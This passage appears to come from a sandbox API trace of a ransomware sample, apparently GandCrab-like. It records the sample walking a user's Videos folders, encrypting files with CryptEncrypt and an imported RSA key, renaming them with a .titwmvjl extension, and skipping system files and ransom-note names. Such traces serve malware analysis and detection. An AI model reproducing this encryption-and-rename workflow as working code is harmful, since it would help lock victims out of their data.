(lpModuleName="Advapi32.dll") returned 0x77550000 [0096.039] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.039] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0096.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.039] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.039] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.040] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.040] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5035b8) returned 1 [0096.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.040] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.040] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.041] GetLastError () returned 0x0 [0096.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.041] CryptDestroyKey (hKey=0x5035b8) returned 1 [0096.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.041] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.041] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.041] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5038f8) returned 1 [0096.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.042] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.042] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.042] GetLastError () returned 0x0 [0096.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.042] CryptDestroyKey (hKey=0x5038f8) returned 1 [0096.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.042] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.042] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.043] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.043] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x14d7c, lpOverlapped=0x0) returned 1 [0096.055] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffeb284, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.055] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14d7c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x14d7c, lpOverlapped=0x0) returned 1 [0096.056] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.056] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0096.057] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.061] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.061] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.062] CloseHandle (hObject=0x2c4) returned 1 [0096.062] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\z6wo.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\z6wo.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0096.063] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.063] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0096.063] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0096.063] CloseHandle (hObject=0x2bc) returned 1 [0096.065] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.065] lstrcmpW (lpString1="r1Vi6EXgtM3SX.avi", lpString2=".") returned 1 [0096.065] lstrcmpW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="..") returned 1 [0096.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="r1Vi6EXgtM3SX.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi" [0096.065] lstrlenW (lpString=".titwmvjl") returned 9 [0096.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned 79 [0096.065] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.065] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi.titwmvjl") returned 88 [0096.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned 79 [0096.065] lstrlenW (lpString=".avi") returned 4 [0096.066] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.066] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0096.066] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0096.066] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned 79 [0096.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned 79 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="desktop.ini") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="autorun.inf") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="ntuser.dat") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="iconcache.db") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="bootsect.bak") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="boot.ini") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="ntuser.dat.log") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="thumbs.db") returned -1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="ntldr") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="NTDETECT.COM") returned 1 [0096.066] lstrcmpiW (lpString1="r1Vi6EXgtM3SX.avi", lpString2="Bootfont.bin") returned 1 [0096.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi") returned 79 [0096.066] lstrlenW (lpString=".avi") returned 4 [0096.066] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.066] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0096.067] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.067] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.067] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\r1vi6exgtm3sx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0096.067] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.067] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0096.068] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.068] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.068] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0096.068] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.069] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.069] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.069] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0096.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.069] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.069] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.069] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0096.070] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.070] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.070] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.070] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0096.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.070] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.070] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.070] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0096.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.071] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503778) returned 1 [0096.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.071] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0096.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.071] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0096.072] GetLastError () returned 0x0 [0096.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.072] CryptDestroyKey (hKey=0x503778) returned 1 [0096.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.072] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.072] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0096.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.072] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503578) returned 1 [0096.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.073] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0096.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.073] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0096.073] GetLastError () returned 0x0 [0096.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.073] CryptDestroyKey (hKey=0x503578) returned 1 [0096.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.073] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.074] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x4574, lpOverlapped=0x0) returned 1 [0096.085] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffffba8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.085] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4574, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x4574, lpOverlapped=0x0) returned 1 [0096.086] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.086] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0096.087] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.091] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.091] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.091] CloseHandle (hObject=0x2bc) returned 1 [0096.092] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\r1vi6exgtm3sx.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\r1Vi6EXgtM3SX.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\r1vi6exgtm3sx.avi.titwmvjl"), dwFlags=0x1) returned 1 [0096.095] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.095] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.095] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.095] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.095] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt" [0096.095] lstrlenW (lpString=".titwmvjl") returned 9 [0096.095] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt") returned 82 [0096.095] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.095] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0096.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt") returned 82 [0096.096] lstrlenW (lpString=".txt") returned 4 [0096.096] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.096] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.096] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.096] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt") returned 82 [0096.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\TITWMVJL-DECRYPT.txt") returned 82 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.096] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.096] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.096] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0096.096] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0096.097] CloseHandle (hObject=0x2b4) returned 1 [0096.097] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.097] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.097] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.097] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt" [0096.097] lstrlenW (lpString=".titwmvjl") returned 9 [0096.097] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt") returned 67 [0096.097] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.097] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 76 [0096.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt") returned 67 [0096.098] lstrlenW (lpString=".txt") returned 4 [0096.098] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.098] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.098] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.098] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt") returned 67 [0096.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\TITWMVJL-DECRYPT.txt") returned 67 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.098] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.098] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.098] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0096.098] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0096.099] CloseHandle (hObject=0x2ac) returned 1 [0096.099] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.099] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0096.100] CloseHandle (hObject=0x230) returned 1 [0096.100] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0096.100] FindClose (in: hFindFile=0x503678 | out: hFindFile=0x503678) returned 1 [0096.100] CloseHandle (hObject=0x228) returned 1 [0096.101] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0096.101] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.101] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.101] lstrcatW (in: lpString1="C:\\Users\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\d2ca4a09d2ca4deb61a.lock") 